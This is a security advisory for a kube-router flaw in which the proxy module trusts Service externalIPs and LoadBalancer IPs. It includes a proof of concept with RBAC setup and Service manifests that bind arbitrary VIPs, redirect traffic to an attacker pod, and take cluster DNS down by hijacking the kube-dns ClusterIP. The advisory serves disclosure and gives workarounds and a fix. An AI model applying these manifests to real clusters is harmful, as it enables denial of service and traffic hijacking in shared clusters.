GHSA-PHQM-JGC3-QF8G
Vulnerability from github – Published: 2026-03-17 17:12 – Updated: 2026-03-19 21:00

kube-router Proxy Module Does Not Validate ExternalIPs or LoadBalancer IPs Against Configured Ranges
Summary
This issue primarily affects multi-tenant clusters where untrusted users are granted namespace-scoped permissions to create or modify Services. Single-tenant clusters or clusters where all Service creators are trusted are not meaningfully affected.
The kube-router proxy module's buildServicesInfo() function directly copies IPs from Service.spec.externalIPs and status.loadBalancer.ingress into node-level network configuration (kube-dummy-if interface, IPVS virtual services, LOCAL routing table) without validating them against the --service-external-ip-range parameter. A user with namespace-scoped Service CRUD permissions can bind arbitrary VIPs on all cluster nodes or cause denial of service to critical cluster services such as kube-dns.
The --service-external-ip-range parameter is only consumed by the netpol (network policy) module for firewall RETURN rules. The proxy module never reads this configuration, creating a gap between administrator expectations and actual enforcement.
Kubernetes' DenyServiceExternalIPs Feature Gate was introduced in v1.22 and remains disabled by default through v1.31, meaning most clusters allow Services to carry externalIPs without any admission control.
Note: This vulnerability class is not unique to kube-router. The upstream Kubernetes project classified the equivalent issue as CVE-2020-8554 (CVSS 5.0/Medium), describing it as a design limitation with no planned in-tree fix. The reference service proxy (kube-proxy) and other third-party service proxy implementations exhibit the same behavior. kube-router's --service-external-ip-range parameter provides more defense-in-depth than most alternatives -- the gap is that this defense did not extend to the proxy module.
Details
Vulnerability Description
Kube-router's proxy module does not validate externalIPs or loadBalancer IPs before programming them into the node's network configuration:
- Unconditional externalIPs copy: buildServicesInfo() directly copy()s Service.spec.ExternalIPs without any range validation
- Unconditional LoadBalancer IP trust: The same function appends status.loadBalancer.ingress[].ip without verification
- --service-external-ip-range not checked by proxy: This parameter is only referenced in the netpol module; the proxy module never checks it
- Cluster-wide impact: IPs are bound to kube-dummy-if on all cluster nodes, added to IPVS, and added to the kube-router-svip ipset
- No conflict detection: ExternalIPs that overlap with existing ClusterIPs (e.g., kube-dns 10.96.0.10) cause the legitimate IPVS real servers to be fully replaced by the attacker's endpoints during the stale-endpoint cleanup cycle, redirecting all traffic for that VIP:port to attacker-controlled pods
Vulnerable Code Locations
File: pkg/controllers/proxy/network_services_controller.go
Lines 866, 898 - Unconditional externalIPs copy:
externalIPs: make([]string, len(svc.Spec.ExternalIPs)),
copy(svcInfo.externalIPs, svc.Spec.ExternalIPs) // No range check
Lines 900-904 - Unconditional LoadBalancer IP trust:
for _, lbIngress := range svc.Status.LoadBalancer.Ingress {
    if len(lbIngress.IP) > 0 {
        svcInfo.loadBalancerIPs = append(svcInfo.loadBalancerIPs, lbIngress.IP)
    }
}
File: pkg/controllers/proxy/utils.go
Lines 425-461 - getAllExternalIPs() merges IPs without range validation:
func getAllExternalIPs(svc *serviceInfo, includeLBIPs bool) map[v1.IPFamily][]net.IP {
    // Only performs IP parsing and deduplication, no range checking
}
File: pkg/controllers/proxy/service_endpoints_sync.go
Lines 460-464 - Binds arbitrary IPs to kube-dummy-if via netlink:
err = nsc.ln.ipAddrAdd(dummyVipInterface, externalIP.String(), nodeIP.String(), true)
File: pkg/controllers/netpol/network_policy_controller.go
Lines 960-967 - --service-external-ip-range is ONLY referenced here:
for _, externalIPRange := range config.ExternalIPCIDRs {
    _, ipnet, err := net.ParseCIDR(externalIPRange)
    npc.serviceExternalIPRanges = append(npc.serviceExternalIPRanges, *ipnet)
}
// The proxy module never references ExternalIPCIDRs
Root Cause
The proxy module was implemented without externalIP range validation. The --service-external-ip-range parameter creates a gap between administrator expectations and actual enforcement: administrators may believe externalIPs are restricted to the configured range, but the proxy module (which actually configures IPVS and network interfaces) does not enforce this restriction.
This is consistent with the broader Kubernetes ecosystem. CVE-2020-8554 documents the same fundamental issue: the Kubernetes API allows Service.spec.externalIPs to be set by any user with Service create/update permissions, and service proxies program these IPs into the data plane without validation. The upstream project's recommended mitigation is API-level admission control (e.g., DenyServiceExternalIPs feature gate, or admission webhooks).
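For illustration, the check that the proxy module omits can be sketched in a few lines of Go. This is a hypothetical sketch, not kube-router code; the function name and signature are illustrative only.

```go
package main

import (
	"fmt"
	"net"
)

// externalIPAllowed reports whether ip falls inside any of the
// operator-configured CIDR ranges (the semantics an administrator would
// expect --service-external-ip-range to enforce in the proxy module).
func externalIPAllowed(ip string, cidrs []string) bool {
	parsed := net.ParseIP(ip)
	if parsed == nil {
		return false // unparseable IPs are rejected
	}
	for _, c := range cidrs {
		_, ipnet, err := net.ParseCIDR(c)
		if err != nil {
			continue // skip malformed ranges
		}
		if ipnet.Contains(parsed) {
			return true
		}
	}
	return false
}

func main() {
	ranges := []string{"10.200.0.0/16"}
	fmt.Println(externalIPAllowed("10.200.0.1", ranges))     // true: inside the range
	fmt.Println(externalIPAllowed("192.168.100.50", ranges)) // false: outside the range
}
```

Because no such check runs in the proxy path, both IPs above are programmed into IPVS and kube-dummy-if regardless of the configured range.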
PoC
Environment Setup
# Kind cluster: 1 control-plane + 1 worker
cat > kind-config.yaml <<EOF
kind: Cluster
apiVersion: kind.x-k8s.io/v1alpha4
name: kube-router-test
networking:
  disableDefaultCNI: true
  kubeProxyMode: "none"
nodes:
- role: control-plane
- role: worker
EOF
kind create cluster --config kind-config.yaml
kubectl apply -f https://raw.githubusercontent.com/cloudnativelabs/kube-router/v2.7.1/daemonset/kubeadm-kuberouter.yaml
kubectl -n kube-system wait --for=condition=ready pod -l k8s-app=kube-router --timeout=120s
# Create low-privileged attacker
kubectl create namespace attacker-ns
kubectl apply -f - <<EOF
apiVersion: v1
kind: ServiceAccount
metadata:
  name: cicd-developer
  namespace: attacker-ns
---
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  namespace: attacker-ns
  name: service-creator
rules:
- apiGroups: [""]
  resources: ["services"]
  verbs: ["get", "list", "create", "update", "patch", "delete"]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: service-creator-binding
  namespace: attacker-ns
subjects:
- kind: ServiceAccount
  name: cicd-developer
  namespace: attacker-ns
roleRef:
  kind: Role
  name: service-creator
  apiGroup: rbac.authorization.k8s.io
EOF
Exploitation
Scenario A: Arbitrary VIP Binding
kubectl --as=system:serviceaccount:attacker-ns:cicd-developer apply -f - <<EOF
apiVersion: v1
kind: Service
metadata:
  name: malicious-externalip
  namespace: attacker-ns
spec:
  selector: { app: non-existent }
  ports: [{ port: 80, targetPort: 80 }]
  externalIPs: ["192.168.100.50", "10.200.0.1", "172.16.0.99"]
EOF
Result: All 3 IPs appear on kube-dummy-if, IPVS rules, and LOCAL routing table on ALL cluster nodes. No validation, no warning, no audit log.
Scenario B: Cluster DNS Takedown (Single Command)
kubectl --as=system:serviceaccount:attacker-ns:cicd-developer apply -f - <<EOF
apiVersion: v1
kind: Service
metadata:
  name: dns-dos-svc
  namespace: attacker-ns
spec:
  selector: { app: non-existent-app }
  ports:
  - { name: dns-udp, port: 53, targetPort: 5353, protocol: UDP }
  - { name: dns-tcp, port: 53, targetPort: 5353, protocol: TCP }
  externalIPs: ["10.96.0.10"]
EOF
Before attack: kube-dns has 2 healthy real servers (CoreDNS pods).
After attack: The legitimate CoreDNS endpoints are fully evicted from the IPVS virtual service via the activeServiceEndpointMap overwrite and stale-endpoint cleanup cycle. If the attacker's Service has a selector pointing to attacker-controlled pods, those pods become the sole real servers for 10.96.0.10:53 -- receiving 100% of cluster DNS traffic. If no matching pods exist, the virtual service has zero real servers and DNS queries blackhole.
After deleting the attacker's Service: DNS immediately recovers.
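The replacement mechanism can be modeled as a toy Go sketch: the proxy keeps one endpoint set per (VIP, protocol, port) key, so whichever Service syncs that key last owns it, and the stale-endpoint cleanup removes the previous real servers. The types and function here are illustrative only, not kube-router's actual data structures.

```go
package main

import "fmt"

// vipKey identifies an IPVS virtual service: one VIP/protocol/port tuple.
type vipKey struct {
	ip       string
	protocol string
	port     int
}

// syncService records endpoints for a VIP key, replacing (not merging)
// whatever a previous sync wrote for the same key.
func syncService(active map[vipKey][]string, key vipKey, endpoints []string) {
	active[key] = endpoints
}

func main() {
	active := map[vipKey][]string{}
	dns := vipKey{ip: "10.96.0.10", protocol: "UDP", port: 53}

	// Legitimate kube-dns sync: CoreDNS pods are the real servers.
	syncService(active, dns, []string{"10.244.0.2:53", "10.244.0.3:53"})

	// An attacker Service carrying externalIP 10.96.0.10 syncs the same
	// key later; its endpoints fully replace the CoreDNS ones.
	syncService(active, dns, []string{"10.244.1.9:5353"})

	fmt.Println(active[dns]) // prints [10.244.1.9:5353]
}
```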
Scenario C: --service-external-ip-range Bypass
With --service-external-ip-range=10.200.0.0/16 configured, 192.168.100.50 (outside the range) is still bound. The proxy module never checks this parameter.
Scenario D: Arbitrary VIP Binding With Attacker Backend
A user can bind an arbitrary IP as a VIP on all cluster nodes. For previously unused IPs, this creates a new IPVS virtual service directing traffic to the attacker's pods. For IPs that match an existing ClusterIP on the same port, the attacker's endpoints replace the legitimate endpoints entirely (see Scenario B for the mechanism).
kubectl -n attacker-ns run attacker-backend --image=nginx:alpine --port=80
kubectl -n attacker-ns exec attacker-backend -- sh -c 'echo "HIJACKED-BY-ATTACKER" > /usr/share/nginx/html/index.html'
kubectl --as=system:serviceaccount:attacker-ns:cicd-developer apply -f - <<EOF
apiVersion: v1
kind: Service
metadata:
  name: hijack-svc
  namespace: attacker-ns
spec:
  selector: { run: attacker-backend }
  ports: [{ port: 80, targetPort: 80 }]
  externalIPs: ["10.50.0.1"]
EOF
$ curl http://10.50.0.1/
HIJACKED-BY-ATTACKER
Impact
Confidentiality: None - No direct data leakage
Integrity: Low - An attacker can bind arbitrary VIPs on cluster nodes and direct traffic to attacker-controlled pods. When an externalIP matches an existing ClusterIP on the same port, the legitimate endpoints are fully replaced by the attacker's endpoints via the IPVS stale-endpoint cleanup cycle -- the attacker receives 100% of that traffic. However, this is bounded to specific (IP, protocol, port) tuples that the attacker explicitly targets, is immediately visible via kubectl get svc, and constitutes traffic redirection rather than transparent interception. This is consistent with the upstream Kubernetes assessment of CVE-2020-8554 (I:Low).
Availability: High - A single command can take down cluster DNS, affecting all pods' name resolution, service discovery, and control plane communication
Attack Scenarios
- Cluster-wide DNS DoS / traffic co-opt: A user creates one Service with an externalIP matching the kube-dns ClusterIP on port 53. The legitimate CoreDNS endpoints are evicted and the attacker's pods receive all DNS queries cluster-wide.
- Arbitrary VIP binding: A user binds unused IPs as VIPs on all cluster nodes, directing traffic to attacker-controlled pods
- ClusterIP conflict exploitation: A user targets any existing ClusterIP:port combination to replace the legitimate service's endpoints with their own
- Security configuration bypass: --service-external-ip-range is not enforced by the proxy module
- Trust boundary violation: Namespace-scoped permissions affect all cluster nodes
Affected Versions
- All kube-router v2.x versions (including latest v2.7.1)
- buildServicesInfo() has never referenced ExternalIPCIDRs
Patched Versions
v2.8.0 and beyond
Workarounds
- Enable DenyServiceExternalIPs Feature Gate: Add --feature-gates=DenyServiceExternalIPs=true to the API server
- Deploy admission policy: Use Kyverno/OPA/ValidatingAdmissionPolicy to restrict Services with externalIPs
- Restrict Service creation RBAC: Tighten RBAC to prevent low-privileged users from creating Services
- Monitor Service changes: Enable Kubernetes audit logging for Service create/update operations
- Apply BGP prefix filtering: If kube-router is configured to advertise externalIPs or ClusterIPs via BGP, configure BGP peers (routers, firewalls) to only accept announcements for expected prefix ranges. This prevents a malicious externalIP from being advertised to and routed by the broader network.
Mitigation
Recommended Permanent Fix
- Proxy module should check --service-external-ip-range: Validate externalIPs against configured ranges in buildServicesInfo()
- Default deny when unconfigured: When --service-external-ip-range is not set, reject all externalIPs
- IP conflict detection: Check externalIPs against existing ClusterIPs and NodeIPs
- Audit logging: Log all externalIP configuration changes
Credits
- @b0b0haha (Reporter)
- @j311yl0v3u (Reporter)
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/cloudnativelabs/kube-router/v2"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.8.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-32254"
],
"database_specific": {
"cwe_ids": [
"CWE-284"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-17T17:12:17Z",
"nvd_published_at": "2026-03-18T04:17:24Z",
"severity": "HIGH"
},
"id": "GHSA-phqm-jgc3-qf8g",
"modified": "2026-03-19T21:00:43Z",
"published": "2026-03-17T17:12:17Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/cloudnativelabs/kube-router/security/advisories/GHSA-phqm-jgc3-qf8g"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32254"
},
{
"type": "WEB",
"url": "https://github.com/cloudnativelabs/kube-router/commit/a1f0b2eea3ee0f66b9a5b5c49dcb714619ccd456"
},
{
"type": "PACKAGE",
"url": "https://github.com/cloudnativelabs/kube-router"
},
{
"type": "WEB",
"url": "https://github.com/cloudnativelabs/kube-router/releases/tag/v2.8.0"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H",
"type": "CVSS_V3"
}
],
"summary": "Kube-router Proxy Module Blindly Trusts ExternalIPs/LoadBalancer IPs Enabling Cluster-Wide Traffic Hijacking and DNS DoS"
}
Sightings
| Author | Source | Type | Date |
|---|---|---|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.